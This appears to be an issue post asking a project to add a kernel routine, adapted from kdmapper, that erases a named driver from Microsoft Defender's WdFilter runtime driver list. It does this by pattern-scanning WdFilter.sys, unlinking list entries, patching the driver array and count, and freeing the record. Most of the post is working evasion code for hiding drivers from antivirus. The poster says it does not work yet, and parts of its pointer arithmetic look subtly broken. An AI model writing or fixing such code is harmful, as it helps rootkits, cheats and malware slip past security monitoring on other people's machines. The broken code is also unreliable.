can you add clear_wdfilter_driver_list?

[BaiFeng666]

`
bool clear_wd_filter_driver_list(const wchar_t* name)
{
DbgBreakPoint();
ULONG WdFilterSize = 0;
auto WdFilter = (ULONG64)GetSystemModuleBase(L"WdFilter.sys", &WdFilterSize);
if (WdFilter == 0) return false;

auto RuntimeDriversList = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
	"48 8B 0D ? ? ? ? FF 05");
if (!RuntimeDriversList) return false;

auto RuntimeDriversCountRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
	"FF 05 ? ? ? ? 48 39 11");
if (!RuntimeDriversCountRef) return false;

auto MpFreeDriverInfoExRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
	"49 8B C9 ? 89 ? 08 E8 ? ? ? ? ? ? ? ? ? ? ? E9");
if (!MpFreeDriverInfoExRef) {
	MpFreeDriverInfoExRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
		"48 89 4A ? 49 8B ? E8 ? ? ? ? ? ? ? ? ? ? ? E9");
	if (!MpFreeDriverInfoExRef) return false;
}

MpFreeDriverInfoExRef += 0x7; // skip until call instruction

RuntimeDriversList = (ULONG64)ResolveRelativeAddress((LPBYTE)RuntimeDriversList, 3);
ULONG64 RuntimeDriversList_Head = RuntimeDriversList - 0x8;
ULONG64 RuntimeDriversCount = (ULONG64)ResolveRelativeAddress((LPBYTE)RuntimeDriversCountRef, 2);
ULONG64 RuntimeDriversArray = RuntimeDriversCount + 0x8;
RuntimeDriversArray = *(ULONG64*)RuntimeDriversArray;
ULONG64 MpFreeDriverInfoEx = (ULONG64)ResolveRelativeAddress((LPBYTE)MpFreeDriverInfoExRef, 1);

for (PLIST_ENTRY Entry = *(PLIST_ENTRY*)(RuntimeDriversList_Head);
	Entry != (LIST_ENTRY*)RuntimeDriversList_Head;
	Entry = Entry->Flink)
{
	//PUNICODE_STRING Unicode_String = (PUNICODE_STRING)((ULONG64)Entry + 0x10);
	UNICODE_STRING Unicode_String = *(UNICODE_STRING*)(Entry + 0x10);
	if (MmIsAddressValid(Unicode_String.Buffer)) {
		LogInfo(0, "Found Driver: %ws", Unicode_String.Buffer);
		if (wcsstr(name, Unicode_String.Buffer)) {

			//remove from RuntimeDriversArray
			bool removedRuntimeDriversArray = false;
			PVOID SameIndexList = (PVOID)((ULONG64)Entry - 0x10);
			for (int k = 0; k < 256; k++) { // max RuntimeDriversArray elements

				PVOID value = *(PVOID*)(RuntimeDriversArray + (k * 8));
				if (value == SameIndexList) {
					PVOID emptyval = (PVOID)(RuntimeDriversCount + 1); // this is not count+1 is position of cout addr+1
					*(PVOID*)(RuntimeDriversArray + (k * 8)) = emptyval;
					removedRuntimeDriversArray = true;
					break;
				}
			}

			if (!removedRuntimeDriversArray) return false;


			auto NextEntry = Entry->Flink;
			auto PrevEntry = Entry->Blink;

			NextEntry->Blink = PrevEntry;
			PrevEntry->Flink = NextEntry;

			// decrement RuntimeDriversCount
			*(ULONG*)RuntimeDriversCount = *(ULONG*)RuntimeDriversCount - 1;
			// call MpFreeDriverInfoEx
			ULONG64 DriverInfo = (ULONG64)Entry - 0x20;

			//verify DriverInfo Magic
			USHORT Magic = *(USHORT*)DriverInfo;
			if (Magic != 0xDA18) {
				//Log("[!] DriverInfo Magic is invalid, new wdfilter version?, driver info will not be released to prevent bsod" << std::endl);
			}
			else {
				using MpFreeDriverInfoExFn = void(__fastcall*)(ULONG64);
				MpFreeDriverInfoExFn MpFreeDriverInfoEx_ = (MpFreeDriverInfoExFn)MpFreeDriverInfoEx;
				MpFreeDriverInfoEx_(DriverInfo);
			}

			//LogInfo(0, "WdFilterDriverList Cleaned: %s\n", Unicode_String.Buffer);
			return true;
		}
	}
}

return false;

}
`

This code was pretty much taken from kdmapper and converted to kernel code, but there are some problems, Unable to match the loaded driver name in runtimeDrivers